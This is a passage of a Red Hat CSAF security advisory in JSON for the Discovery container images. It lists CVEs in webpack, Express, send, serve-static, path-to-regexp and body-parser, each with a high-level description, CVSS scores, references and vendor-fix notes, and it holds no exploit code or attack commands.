"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "rhdh-hub-container 1.2 and 1.3 have included patches for this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45296",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-09T19:20:18.127723+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310908"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "path-to-regexp: Backtracking regular expressions cause ReDoS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45296"
},
{
"category": "external",
"summary": "RHBZ#2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f",
"url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6",
"url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j"
}
],
"release_date": "2024-09-09T19:15:13.330000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "path-to-regexp: Backtracking regular expressions cause ReDoS"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
